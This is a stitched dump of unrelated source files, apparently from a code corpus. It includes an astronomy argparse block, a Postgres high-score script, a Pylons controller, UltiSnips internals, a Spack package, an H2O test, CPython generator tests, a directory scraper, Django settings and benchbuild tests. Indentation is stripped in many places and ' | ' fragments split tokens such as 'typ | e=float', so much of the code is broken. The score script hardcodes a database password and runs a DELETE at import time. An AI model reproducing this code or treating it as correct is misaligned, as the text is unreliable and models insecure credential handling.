if __name__ == "__main__":
parser=argparse.ArgumentParser(
description="Search GALFACTS for sources.",
prog='find_sources.py',
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument('--version', action='version',
version='%(prog)s '+vers)
required=parser.add_argument_group('required arguments:')
required.add_argument('--field',type=str,
help="field to analyze",
required=True)
required.add_argument('--date',type=int,
help="date to analyze",
required=True)
semi_opt=parser.add_argument_group('arguments set to defaults:')
semi_opt.add_argument('--data_filepath',type=str,
help='path where data are saved',
default="../data")
semi_opt.add_argument('--results_filepath',type=str,
help='path where results are saved',
default="../results")
semi_opt.add_argument('--beams',type=int,nargs="+",
help='beams to analyze',
default=[0,1,2,3,4,5,6])
semi_opt.add_argument('--ra_corr',typ | e=float,nargs=7,
help='RA beam location correction',
metavar=("BEAM0","BEAM1","BEAM2","BEAM3",
"BEAM4","BEAM5","BEAM6"),
default=[0.,2.7417,5.4833,2.7417,-2.7417,
-5.4833,-2.7417])
semi_opt.add_argument('--num_channels',type=int,
help | ='number of channels in observation',
default=2048)
semi_opt.add_argument('--bin_width',type=float,
help='width of analysis bins in MHz',
default=5.)
semi_opt.add_argument('--band_width',type=float,
help='width of band in MHz',
default=172.5)
semi_opt.add_argument('--rfi_con_width',type=int,
help='convolution half-width for RFI detection '+
'in channels',
default=1)
semi_opt.add_argument('--smooth_con_width',type=int,
help='convolution half-width for smoothing '+
'in time points',
default=28)
semi_opt.add_argument('--source_con_width',type=int,
help='convolution width for source '+
'detection in time points',
default=24)
semi_opt.add_argument('--edge_buff_chan',type=int,
help='channels to cut from convolution '+
'edge',
default=125)
semi_opt.add_argument('--edge_buff_time',type=int,
help='time points to cut from convolution '+
'edge',
default=52)
semi_opt.add_argument('--num_intervals',type=int,
help='number of intervals for calculating '+
'RFI mask',
default=10)
semi_opt.add_argument('--rfi_mask',type=float,
help='sigma for RFI cut',
default=6.)
semi_opt.add_argument('--source_mask',type=float,
help='sigma (SNR) for source cut',
default=8.)
semi_opt.add_argument('--sigma',type=float,
help='theoretical noise level in Kelvin',
default=0.017)
semi_opt.add_argument('--num_source_points',type=int,
help='number of points to fit around '+
'each source peak',
default=8)
semi_opt.add_argument('--point_sep',type=int,
                          help='number of points to skip in fitting '+
'source (skips sidelobes)',
default=25)
semi_opt.add_argument('--num_outer_points',type=int,
help='number of points to fit to get '+
'baseline level',
default=5)
semi_opt.add_argument('--ast_offset',type=float,
help='fraction offset correction to AST '+
'coordinates and time',
default=0.5)
semi_opt.add_argument('--amp_req',type=float,
help='Source fit e_amplitude/amplitude requirement',
default=0.1)
semi_opt.add_argument('--width_req',type=float,
help='Source fit e_width/width requirement',
default=0.1)
# semi_opt.add_argument('--dec',type=float,nargs=2,
# metavar=('LOWER','UPPER'),
# help="analyze only this declination range, "+
# "inclusively, in degrees",
# default=[-90.,90.])
optional=parser.add_argument_group('other optional arguments:')
optional.add_argument('--exclude_channels',type=int,nargs='+',
help="channels to exclude")
optional.add_argument('-v','--verbose',help="verbose analysis",
action="store_true")
optional.add_argument('-f','--file_verbose',
help="make lots of intermediate files",
action="store_true")
args = vars(parser.parse_args())
main(**args)
|
goru47/INF1L-PRJ-2 | INF1L-PRJ-2/BattlePortDatabase.py | Python | mit | 2,314 | 0.013829 | #import modules
import psycopg2
# Connect to database
connection = psycopg2.connect(database="BattlePort", user="postgres", password="ivo123", host="127.0.0.1", port="5433")
print ("Opened database successfully")
cursor = connection.cursor()
# Create the table
def create_table():
cursor.execute("CREATE TABLE IF NOT EXISTS Scores(pid integer, naam varchar(20), score integer, primary key (pid))")
# Add data to the table
def data_entry(pid, naam, score):
connection = psycopg2.connect(database="BattlePort", user="postgres", password="ivo123", host="127.0.0.1", port="5433")
cursor = connection.cursor()
cursor.execute("insert into scores values(%s, %s, %s);", (pid, naam, score))
connection.commit()
cursor.close()
connection.close()
print("data added successfully")
# Print data from the table
def kweerie(zoekopdracht):
    cursor.execute(zoekopdracht)  # select
    rows = cursor.fetchall()  # copy
    for row in rows:
        print("PID = ", row[0])
        print("Naam = ", row[ | 1])
        print("Score = ", row[2], "\n")
        print("----------------------------------")
    return rows
# Read the database
def read_database(zoekopdracht):
    cursor.execute(zoekopdracht)  # select
    #rows = cursor.fetchall()  # copy
    for row in cursor.fetchal | l():
        print(row)
#create_table()
#data_entry(730, 'jan', 304)
#data_entry(675, 'guus', 5677)
#kweerie("SELECT * FROM scores WHERE score > 9000")
#kweerie("SELECT * FROM scores WHERE score > 5000 AND score < 9000")
#kweerie("SELECT * FROM scores WHERE score < 5000")
#kweerie("SELECT * FROM scores order by score DESC ")
# Downloads the top score from database
def download_top_score():
result = kweerie("SELECT * FROM scores ORDER BY score DESC")
return result
def delete(pid, naam, score):
    cursor.execute("DELETE FROM scores WHERE pid = %s AND naam = %s AND score = %s;", (pid, naam, score))
#delete(156,'marnix', 9012)
#download_top_score()
cursor.execute("delete from scores * where score = 0;")
#cursor.execute("DELETE from scores where pid = 830;")
connection.commit()
download_top_score()
kweerie("SELECT * FROM scores where naam = 'Default'")
#dfatabase = cursor.execute("DELETE FROM scores WHERE score = 0;")
|
buchuki/prickle | prickle/controllers/projects.py | Python | agpl-3.0 | 2,138 | 0.000935 | # Copyright 2010-2011 Dusty Phillips
# This file is part of Prickle.
# Prickle is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of
# the License, or (at your option) any later version.
# Prickle is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General
# Public License along with Prickle. If not, see
# <http://www.gnu.org/licenses/>.
import logging
from decimal import Decimal
from pylons.decorators import validate
from pylons import request, response, session, tmpl_context as c, url
from pylons.controllers.util import abort, redirect
from prickle.lib.base import BaseController, render
from prickle.model.timesheet import Timesheet, Project, ProjectType
from prickle.forms.timesheet import RateForm
log = logging.getLogger(__name__)
class ProjectsController(BaseController):
def list(self):
c.projects = Project.objects()
return render('/project/project_list.html')
def view(self, id):
c.project, created = Project.objects.get_or_ | create(name=id)
return render('/project/project_form.html')
|
@validate(schema=RateForm, form='view')
def edit(self, id):
project, created = Project.objects.get_or_create(name=id)
project.rate = self.form_result['rate']
project.save()
return redirect(url(controller="timesheet", action="index"))
@validate(schema=RateForm, form='view')
def type_rate(self, project, type):
project, created = Project.objects.get_or_create(name=project)
project_type, created = ProjectType.objects.get_or_create(
project=project, type=type)
project_type.rate = self.form_result['rate']
project_type.save()
return redirect(url(controller="timesheet", action="project",
id=project))
|
Insanityandme/dotfiles | vim/bundle/ultisnips/pythonx/UltiSnips/snippet/definition/_base.py | Python | unlicense | 14,330 | 0.000349 | #!/usr/bin/env python
# encoding: utf-8
"""Snippet representation after parsing."""
import re
import vim
import textwrap
from UltiSnips import _vim
from UltiSnips.compatibility import as_unicode
from UltiSnips.indent_util import IndentUtil
from UltiSnips.text import escape
from UltiSnips.text_objects import SnippetInstance
from UltiSnips.text_objects._python_code import \
SnippetUtilCursor, SnippetUtilForAction
__WHITESPACE_SPLIT = re.compile(r"\s")
def split_at_whitespace(string):
"""Like string.split(), but keeps empty words as empty words."""
return re.split(__WHITESPACE_SPLIT, string)
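# Illustrative: split_at_whitespace("a  b") -> ['a', '', 'b'], whereas
# "a  b".split() would silently drop the empty word.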
def _words_for_line(trigger, before, num_words=None):
"""Gets the final 'num_words' words from 'before'.
If num_words is None, then use the number of words in 'trigger'.
"""
if num_words is None:
num_words = len(split_at_whitespace(trigger))
word_list = split_at_whitespace(before)
if len(word_list) <= num_words:
return before.strip()
else:
before_words = before
for i in range(-1, -(num_words + 1), -1):
left = before_words.rfind(word_list[i])
before_words = before_words[:left]
return before[len(before_words):].strip()
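# Illustrative (hypothetical inputs): _words_for_line('ab', 'foo bar ab')
# returns 'ab'; with num_words=2 it returns 'bar ab'.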
class SnippetDefinition(object):
"""Represents a snippet as parsed from a file."""
_INDENT = re.compile(r"^[ \t]*")
_TABS = re.compile(r"^\t*")
def __init__(self, priority, trigger, value, description,
options, globals, location, context, actions):
self._priority = int(priority)
self._trigger = as_unicode(trigger)
self._value = as_unicode(value)
self._description = as_unicode(description)
self._opts = options
self._matched = ''
self._last_re = None
self._globals = globals
self._location = location
self._context_code = context
self._context = None
self._actions = actions
# Make sure that we actually match our trigger in case we are
# immediately expanded.
self.matches(self._trigger)
def __repr__(self):
return '_SnippetDefinition(%r,%s,% | s,%s)' % (
self._priority, self._trigger, self._description, self._opts)
def _re_matc | h(self, trigger):
"""Test if a the current regex trigger matches `trigger`.
If so, set _last_re and _matched.
"""
for match in re.finditer(self._trigger, trigger):
if match.end() != len(trigger):
continue
else:
self._matched = trigger[match.start():match.end()]
self._last_re = match
return match
return False
def _context_match(self, visual_content):
# skip on empty buffer
if len(vim.current.buffer) == 1 and vim.current.buffer[0] == "":
return
locals = {
'context': None,
'visual_mode': '',
'visual_text': '',
'last_placeholder': None
}
if visual_content:
locals['visual_mode'] = visual_content.mode
locals['visual_text'] = visual_content.text
locals['last_placeholder'] = visual_content.placeholder
return self._eval_code('snip.context = ' + self._context_code,
locals).context
def _eval_code(self, code, additional_locals={}):
code = "\n".join([
'import re, os, vim, string, random',
'\n'.join(self._globals.get('!p', [])).replace('\r\n', '\n'),
code
])
current = vim.current
locals = {
'window': current.window,
'buffer': current.buffer,
'line': current.window.cursor[0]-1,
'column': current.window.cursor[1]-1,
'cursor': SnippetUtilCursor(current.window.cursor),
}
locals.update(additional_locals)
snip = SnippetUtilForAction(locals)
try:
exec(code, {'snip': snip})
except Exception as e:
self._make_debug_exception(e, code)
raise
return snip
def _execute_action(
self,
action,
context,
additional_locals={}
):
mark_to_use = '`'
with _vim.save_mark(mark_to_use):
_vim.set_mark_from_pos(mark_to_use, _vim.get_cursor_pos())
cursor_line_before = _vim.buf.line_till_cursor
locals = {
'context': context,
}
locals.update(additional_locals)
snip = self._eval_code(action, locals)
if snip.cursor.is_set():
vim.current.window.cursor = snip.cursor.to_vim_cursor()
else:
new_mark_pos = _vim.get_mark_pos(mark_to_use)
cursor_invalid = False
if _vim._is_pos_zero(new_mark_pos):
cursor_invalid = True
else:
_vim.set_cursor_from_pos(new_mark_pos)
if cursor_line_before != _vim.buf.line_till_cursor:
cursor_invalid = True
if cursor_invalid:
raise RuntimeError(
'line under the cursor was modified, but ' +
'"snip.cursor" variable is not set; either set set ' +
'"snip.cursor" to new cursor position, or do not ' +
'modify cursor line'
)
return snip
def _make_debug_exception(self, e, code=''):
e.snippet_info = textwrap.dedent("""
Defined in: {}
Trigger: {}
Description: {}
Context: {}
Pre-expand: {}
Post-expand: {}
""").format(
self._location,
self._trigger,
self._description,
self._context_code if self._context_code else '<none>',
self._actions['pre_expand'] if 'pre_expand' in self._actions
else '<none>',
self._actions['post_expand'] if 'post_expand' in self._actions
else '<none>',
code,
)
e.snippet_code = code
def has_option(self, opt):
"""Check if the named option is set."""
return opt in self._opts
@property
def description(self):
"""Descriptive text for this snippet."""
return ('(%s) %s' % (self._trigger, self._description)).strip()
@property
def priority(self):
"""The snippets priority, which defines which snippet will be preferred
over others with the same trigger."""
return self._priority
@property
def trigger(self):
"""The trigger text for the snippet."""
return self._trigger
@property
def matched(self):
"""The last text that matched this snippet in match() or
could_match()."""
return self._matched
@property
def location(self):
"""Where this snippet was defined."""
return self._location
@property
def context(self):
"""The matched context."""
return self._context
def matches(self, before, visual_content=None):
"""Returns True if this snippet matches 'before'."""
# If user supplies both "w" and "i", it should perhaps be an
# error, but if permitted it seems that "w" should take precedence
# (since matching at word boundary and within a word == matching at word
# boundary).
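        # Illustrative: with option "w" and trigger "if", typing "elif" does
        # not expand (no word boundary before the match), while "x if" does
        # (hypothetical triggers, for intuition only).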
self._matched = ''
words = _words_for_line(self._trigger, before)
if 'r' in self._opts:
try:
match = self._re_match(before)
except Exception as e:
self._make_debug_exception(e)
raise
elif 'w' in self._opts:
words_len = len(self._trigger)
words_prefix = words[:-words_len]
words_suffix = words[-words_len:]
match = (words_suffix == self._trigger)
if match and words_prefix:
# Require a word boundary between prefix and suffix.
boundary_ch |
tmerrick1/spack | var/spack/repos/builtin/packages/fyba/package.py | Python | lgpl-2.1 | 2,243 | 0.000446 | ##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Fyba(AutotoolsPackage):
"""OpenFYBA is the source code release of the FYBA library, distributed
by the National Mapping Authority of Norway (Statens kartverk) to read
and write files in the National geodata standard format SOSI."""
homepage = "https://github.com/kartverket/fyba"
url = "https://github.com/kartverket/fyba/archive/4.1.1.tar.gz"
version('4.1.1', 'ab687582efdef26593796271529a10cb')
# configure: error: canno | t find install-sh or install.sh
force_autoreconf = True
depends_on('autoconf', type='bu | ild')
depends_on('automake', type='build')
depends_on('libtool', type='build')
depends_on('m4', type='build')
# error: macro "min" passed 3 arguments, but takes just 2
# https://github.com/kartverket/fyba/issues/21
patch('gcc-6.patch')
# fatal error: 'sys/vfs.h' file not found
# https://github.com/kartverket/fyba/issues/12
patch('vfs-mount-darwin.patch', when='platform=darwin')
|
kamyu104/LeetCode | Python/range-addition-ii.py | Python | mit | 1,282 | 0.00156 | # Time: O(p), p is the number of ops
# Space: O(1)
# Given an m * n matrix M initialized with all 0's and several update operations.
#
# Operations are represented by a 2D array,
# and each operation is represented by an array with two positive integers a and b,
# which means M[i][j] should be added by one for all 0 <= i < a and 0 <= j < b.
#
| # You need to count and return the number of maximum integers
# in the mat | rix after performing all the operations.
#
# Example 1:
# Input:
# m = 3, n = 3
# operations = [[2,2],[3,3]]
# Output: 4
# Explanation:
# Initially, M =
# [[0, 0, 0],
# [0, 0, 0],
# [0, 0, 0]]
#
# After performing [2,2], M =
# [[1, 1, 0],
# [1, 1, 0],
# [0, 0, 0]]
#
# After performing [3,3], M =
# [[2, 2, 1],
# [2, 2, 1],
# [1, 1, 1]]
#
# So the maximum integer in M is 2, and there are four of it in M. So return 4.
# Note:
# The range of m and n is [1,40000].
# The range of a is [1,m], and the range of b is [1,n].
# The range of operations size won't exceed 10,000.
class Solution(object):
def maxCount(self, m, n, ops):
"""
:type m: int
:type n: int
:type ops: List[List[int]]
:rtype: int
"""
for op in ops:
m = min(m, op[0])
n = min(n, op[1])
return m*n
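# Quick sanity check against the examples above (illustrative driver, not
# part of the original file):
if __name__ == "__main__":
    assert Solution().maxCount(3, 3, [[2, 2], [3, 3]]) == 4
    assert Solution().maxCount(3, 3, []) == 9  # no ops: every cell stays 0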
|
janezhango/BigDataMachineLearning | py/testdir_multi_jvm_fvec/test_KMeans_covtype20x_fvec.py | Python | apache-2.0 | 2,882 | 0.007634 | import unittest, time, sys, random
sys.path.extend(['.','..','py'])
import h2o, h2o_cmd, h2o_glm, h2o_hosts, h2o_kmeans
import h2o_browse as h2b, h2o_import as h2i
class Basic(unittest.TestCase):
def tearDown(self):
h2o.check_sandbox_for_errors()
@classmethod
def setUpClass(cls):
global localhost
localhost = h2o.decide_if_localhost()
if (localhost):
h2o.build_cloud(2,java_heap_GB=5)
else:
h2o_hosts.build_cloud_with_hosts()
@classmethod
def tearDownClass(cls):
h2o.tear_down_cloud()
def test_KMeans_covtype20x_fvec(self):
h2o.beta_features = True
if localhost:
csvFilenameList = [
# 68 secs on my laptop?
('covtype20x.data', 1200, 'cA'),
]
else:
# None is okay for hex_key
csvFilenameList = [
('covtype20x.data', 1200,'cA'),
# ('covtype200x.data', 1000,'cE'),
]
importFolderPath = "standard"
| for csvFilename, timeoutSecs, hex_key in csvFilenameList:
csvPathname = importFolderPath + "/" + csvFilename
# creates csvFilename.hex from file in importFolder dir
start = time.time()
parseResult = h2i.import_parse(bucket='home-0xdiag-datasets', path=csvPathname,
timeoutSecs=2000, hex_key=hex_key) # noise=('JStack', None)
print "parse end on ", csvPathname, 'took', time.time() - start, 'seconds'
h2 | o.check_sandbox_for_errors()
inspect = h2o_cmd.runInspect(None, parseResult['destination_key'])
print "\n" + csvPathname, \
" numRows:", "{:,}".format(inspect['numRows']), \
" numCols:", "{:,}".format(inspect['numCols'])
k = 2
kwargs = {
'max_iter': 25,
'initialization': 'Furthest',
'k': k,
# reuse the same seed, to get deterministic results (otherwise sometimes fails
'seed': 265211114317615310,
}
start = time.time()
kmeans = h2o_cmd.runKMeans(parseResult=parseResult, \
timeoutSecs=timeoutSecs, retryDelaySecs=2, pollTimeoutSecs=60, **kwargs)
elapsed = time.time() - start
print "kmeans end on ", csvPathname, 'took', elapsed, 'seconds.', \
"%d pct. of timeout" % ((elapsed/timeoutSecs) * 100)
h2o_kmeans.simpleCheckKMeans(self, kmeans, **kwargs)
(centers, tupleResultList) = h2o_kmeans.bigCheckResults(self, kmeans, csvPathname, parseResult, 'd', **kwargs)
gs = h2o.nodes[0].gap_statistic(source=hex_key, k_max=8)
print "gap_statistic:", h2o.dump_json(gs)
if __name__ == '__main__':
h2o.unit_main()
|
michalliu/OpenWrt-Firefly-Libraries | staging_dir/target-mipsel_1004kc+dsp_uClibc-0.9.33.2/usr/lib/python3.4/test/test_generators.py | Python | gpl-2.0 | 54,447 | 0.000404 | import gc
import sys
import unittest
import weakref
from test import support
class FinalizationTest(unittest.TestCase):
def test_frame_resurrect(self):
# A generator frame can be resurrected by a generator's finalization.
def gen():
nonlocal frame
try:
yield
finally:
frame = sys._getframe()
g = gen()
wr = weakref.ref(g)
next(g)
| del g
support.gc_collect()
self | .assertIs(wr(), None)
self.assertTrue(frame)
del frame
support.gc_collect()
def test_refcycle(self):
# A generator caught in a refcycle gets finalized anyway.
old_garbage = gc.garbage[:]
finalized = False
def gen():
nonlocal finalized
try:
g = yield
yield 1
finally:
finalized = True
g = gen()
next(g)
g.send(g)
self.assertGreater(sys.getrefcount(g), 2)
self.assertFalse(finalized)
del g
support.gc_collect()
self.assertTrue(finalized)
self.assertEqual(gc.garbage, old_garbage)
class ExceptionTest(unittest.TestCase):
# Tests for the issue #23353: check that the currently handled exception
# is correctly saved/restored in PyEval_EvalFrameEx().
def test_except_throw(self):
def store_raise_exc_generator():
try:
self.assertEqual(sys.exc_info()[0], None)
yield
except Exception as exc:
# exception raised by gen.throw(exc)
self.assertEqual(sys.exc_info()[0], ValueError)
self.assertIsNone(exc.__context__)
yield
# ensure that the exception is not lost
self.assertEqual(sys.exc_info()[0], ValueError)
yield
# we should be able to raise back the ValueError
raise
make = store_raise_exc_generator()
next(make)
try:
raise ValueError()
except Exception as exc:
try:
make.throw(exc)
except Exception:
pass
next(make)
with self.assertRaises(ValueError) as cm:
next(make)
self.assertIsNone(cm.exception.__context__)
self.assertEqual(sys.exc_info(), (None, None, None))
def test_except_next(self):
def gen():
self.assertEqual(sys.exc_info()[0], ValueError)
yield "done"
g = gen()
try:
raise ValueError
except Exception:
self.assertEqual(next(g), "done")
self.assertEqual(sys.exc_info(), (None, None, None))
def test_except_gen_except(self):
def gen():
try:
self.assertEqual(sys.exc_info()[0], None)
yield
# we are called from "except ValueError:", TypeError must
# inherit ValueError in its context
raise TypeError()
except TypeError as exc:
self.assertEqual(sys.exc_info()[0], TypeError)
self.assertEqual(type(exc.__context__), ValueError)
# here we are still called from the "except ValueError:"
self.assertEqual(sys.exc_info()[0], ValueError)
yield
self.assertIsNone(sys.exc_info()[0])
yield "done"
g = gen()
next(g)
try:
raise ValueError
except Exception:
next(g)
self.assertEqual(next(g), "done")
self.assertEqual(sys.exc_info(), (None, None, None))
def test_except_throw_exception_context(self):
def gen():
try:
try:
self.assertEqual(sys.exc_info()[0], None)
yield
except ValueError:
# we are called from "except ValueError:"
self.assertEqual(sys.exc_info()[0], ValueError)
raise TypeError()
except Exception as exc:
self.assertEqual(sys.exc_info()[0], TypeError)
self.assertEqual(type(exc.__context__), ValueError)
# we are still called from "except ValueError:"
self.assertEqual(sys.exc_info()[0], ValueError)
yield
self.assertIsNone(sys.exc_info()[0])
yield "done"
g = gen()
next(g)
try:
raise ValueError
except Exception as exc:
g.throw(exc)
self.assertEqual(next(g), "done")
self.assertEqual(sys.exc_info(), (None, None, None))
tutorial_tests = """
Let's try a simple generator:
>>> def f():
... yield 1
... yield 2
>>> for i in f():
... print(i)
1
2
>>> g = f()
>>> next(g)
1
>>> next(g)
2
"Falling off the end" stops the generator:
>>> next(g)
Traceback (most recent call last):
File "<stdin>", line 1, in ?
File "<stdin>", line 2, in g
StopIteration
"return" also stops the generator:
>>> def f():
... yield 1
... return
... yield 2 # never reached
...
>>> g = f()
>>> next(g)
1
>>> next(g)
Traceback (most recent call last):
File "<stdin>", line 1, in ?
File "<stdin>", line 3, in f
StopIteration
>>> next(g) # once stopped, can't be resumed
Traceback (most recent call last):
File "<stdin>", line 1, in ?
StopIteration
"raise StopIteration" stops the generator too:
>>> def f():
... yield 1
... raise StopIteration
... yield 2 # never reached
...
>>> g = f()
>>> next(g)
1
>>> next(g)
Traceback (most recent call last):
File "<stdin>", line 1, in ?
StopIteration
>>> next(g)
Traceback (most recent call last):
File "<stdin>", line 1, in ?
StopIteration
However, they are not exactly equivalent:
>>> def g1():
... try:
... return
... except:
... yield 1
...
>>> list(g1())
[]
>>> def g2():
... try:
... raise StopIteration
... except:
... yield 42
>>> print(list(g2()))
[42]
This may be surprising at first:
>>> def g3():
... try:
... return
... finally:
... yield 1
...
>>> list(g3())
[1]
Let's create an alternate range() function implemented as a generator:
>>> def yrange(n):
... for i in range(n):
... yield i
...
>>> list(yrange(5))
[0, 1, 2, 3, 4]
Generators always return to the most recent caller:
>>> def creator():
... r = yrange(5)
... print("creator", next(r))
... return r
...
>>> def caller():
... r = creator()
... for i in r:
... print("caller", i)
...
>>> caller()
creator 0
caller 1
caller 2
caller 3
caller 4
Generators can call other generators:
>>> def zrange(n):
... for i in yrange(n):
... yield i
...
>>> list(zrange(5))
[0, 1, 2, 3, 4]
"""
# The examples from PEP 255.
pep_tests = """
Specification: Yield
Restriction: A generator cannot be resumed while it is actively
running:
>>> def g():
... i = next(me)
... yield i
>>> me = g()
>>> next(me)
Traceback (most recent call last):
...
File "<string>", line 2, in g
ValueError: generator already executing
Specification: Return
Note that return isn't always equivalent to raising StopIteration: the
difference lies in how enclosing try/except constructs are treated.
For example,
>>> def f1():
... try:
... return
... except:
... yield 1
>>> print(list(f1()))
[]
because, as in any function, return simply exits, but
>>> def f2():
... try:
... raise StopIteration
... except:
|
landscape-test/all-messages | messages/pylint/E0202.py | Python | unlicense | 47 | 0 | """
E0202
An att | ribute is hiding | a method
"""
|
simbuerg/benchbuild | benchbuild/tests/test_run.py | Python | mit | 2,638 | 0.000758 | """
This test runs through benchbuild's execution pipeline.
"""
import os
import unittest
from contextlib import contextmanager
from benchbuild.utils import cmd
def shadow_commands(command):
def shadow_command_fun(func):
def shadow_command_wrapped_fun(self, *args, **kwargs):
cmd.__override_all__ = command
res = func(self, *args, **kwargs)
cmd.__override_all__ = None
return res
return shadow_command_wrapped_fun
return shadow_command_fun
class TestShadow(unittest.TestCase):
def test_shadow(self):
inside = None
true = cmd.true
mkdir = cmd.mkdir
class test_class(object):
@shadow_commands("true")
def shadow_hook(self):
return cmd.mkdir
outside = cmd.mkdir
inside = test_class().shadow_hook()
self.assertEqual(inside.formulate(), true.formulate(),
msg="true (before) is not the same as true (inside)")
        self.assertNotEqual(mkdir.formulate(), inside.formulate(),
                            msg="mkdir (before) is the same as mkdir (inside)")
        self.assertNotEqual(inside.formulate(), outside.formulate(),
                            msg="mkdir (inside) is the same as mkdir (after)")
self.assertEqual(mkdir.formulate(), outside.formulate(),
msg="mkdir (before) is not the same as mkdir (after)")
class TestRun(unittest.TestCase):
@shadow_commands("true")
def test_run(self):
from benchbuild import experimen | t
from benchbuild.utils.actions import Experiment
class MockExp(experiment.Experiment):
NAME = "mock-exp"
def actions_for_project(self, project):
from benchbuild.utils.actions import (
Prepare, Download, Configure, Build, Run, Clean)
inside = None
actns = []
project.builddir = "/tmp/throwaway"
actns = [Prepare(project),
Download(project),
Configure(project),
Build(project),
Run(project),
Clean(project)]
return actns
exp = MockExp(group="polybench")
eactn = Experiment(exp, exp.actions())
old_exists = os.path.exists
os.path.exists = lambda p: True
print(eactn)
eactn()
os.path.exists = old_exists
if __name__ == "__main__":
from benchbuild.utils import log
log.configure()
TestRun().test_run()
|
ScottyLabs/directory-api | input_parser.py | Python | mit | 2,729 | 0.004764 | import dir_search
from bs4.element import Tag
class Parser :
data : Tag or None
single : bool
error : bool
results : list[dict] or dict
def __init__(self, data : Tag):
self.data = data
if data is not None:
self.error = bool(data.findPrevious('p', class_="error"))
self.single = 'class' not in data.attrs
def parse_single(self):
if not self.single:
raise TypeError("Cannot parse multiple results")
self.results = {'listing': self.data.h1.text}
for entry in self.data.find_all | ("b"):
if entry.text == "Display Name:":
self.results['name'] = entry.next_sibling[1:]
if entry.text == "Email:":
se | lf.results['email'] = entry.next_sibling[1:]
if entry.text == "Andrew UserID:":
self.results['andrew_id'] = entry.next_sibling[1:]
if entry.text == "Advisor:":
self.results['advisor'] = entry.findNext().text
if entry.text == "Phone:":
self.results['phone'] = entry.next_sibling[1:]
if entry.text == "Job Title According to HR:":
self.results['job'] = entry.next_sibling.next_sibling.text
if entry.text == "Student Class Level:":
self.results['class_level'] = entry.next_sibling.next_sibling.text
if entry.text == "Student Class Level:":
self.results['class_level'] = entry.next_sibling.next_sibling.text
if entry.text == "Department with which this person is affiliated:":
dep = []
for i in entry.nextSiblingGenerator():
if i.name != 'br' and i.name is not None:
break
elif i.name is None:
dep.append(i.text)
self.results['department'] = dep
def parse_multi(self):
if self.single:
raise TypeError("Result is not tabular")
rows = self.data.find_all('tr')
self.results = []
keys = ['last', 'first', 'andrew_id', 'affiliation', 'department']
for r in rows[1:]:
self.results.append(dict(map(lambda e : (e[0], e[1].text), zip(keys, r.find_all('td')))))
def parse(self):
if self.data is None:
self.results = None
elif self.single:
self.parse_single()
else:
self.parse_multi()
if __name__ == "__main__":
# result = dir_search.basic("david")
# print(result.error)
# for idx, val in enumerate(result.contents):
# print(idx, " ", val)
p = Parser(dir_search.basic("brandon"))
p.parse()
print(p.results)
|
pando85/django-registration | test_app/settings_test.py | Python | bsd-3-clause | 1,575 | 0 | # coding: utf-8
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': ' | :memory:',
},
}
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.admin',
'django.contrib.sites',
'django.contrib.sessions',
'django.contrib.contenttypes',
'registration',
'test_app',
)
DEBUG = True
ALLOWED_HOSTS = ['*']
SECRET_KEY = '_'
SITE_ID = 1
ROOT_URLCONF = 'test_app.urls_admin_approval'
TEMPLATES = | [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'OPTIONS': {
'context_processors': [
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.debug',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
],
'loaders': [
'django.template.loaders.app_directories.Loader',
],
},
},
]
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ADMINS = (
('admin1', 'admin1@mail.server.com'),
('admin2', 'admin2@mail.server.com'),
)
|
v-legoff/pa-poc3 | src/controller/controller.py | Python | bsd-3-clause | 3,681 | 0.000543 | # Copyright (c) 2012 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
